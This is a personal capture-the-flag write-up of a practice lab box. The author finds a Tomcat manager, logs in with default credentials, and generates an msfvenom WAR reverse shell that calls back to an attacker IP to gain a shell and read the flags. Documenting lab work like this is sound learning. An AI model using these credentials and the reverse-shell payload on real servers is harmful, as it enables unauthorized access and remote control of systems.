I was able to solve this box today on my own without relying on a walkthrough, following yesterday’s success with the box named Blue. I feel like the hard work that I have put in over the past couple of months is finally paying off. I am so happy :)
nmap scan
directory busting with gobuster
gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
http://10.10.10.95:8080/docs
http://10.10.10.95:8080/example
http://10.10.10.95:8080/manager
After a few tries of default credentials, it automatically redirected me to the manager/html page, and the second line listed the username tomcat and the password s3cret, so I tried those credentials, though I was skeptical.
Contrary to my doubts, the username and password hit the mark and took me to the Tomcat Web Application Manager.
After scrolling down a bit, I found a section, WAR file to deploy, where I could upload a file. As soon as I saw this functionality, I thought of generating a payload, running it on the server, and finally popping a reverse shell to gain access.
Generating payload
Since we need to upload a .war reverse shell, I referred to the Reverse Shell Cheatsheet from the well-known PayloadsAllTheThings GitHub repository.
The full command to generate the shell, followed by a quick strings check of the resulting archive, looks like this:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f war > reverse.war
strings reverse.war
Uploaded the generated payload.
After uploading the payload and clicking the Deploy button, a new path named reverse appeared under the Applications section for the payload I created.
Before navigating to the new path to run the payload, I needed to set up a listener on that port. Then, I successfully gained the shell.
After spending some time exploring the directories, I finally found the flags directory, which included a text file called 2 for the price of 1.txt that contained both the user flag and the root flag.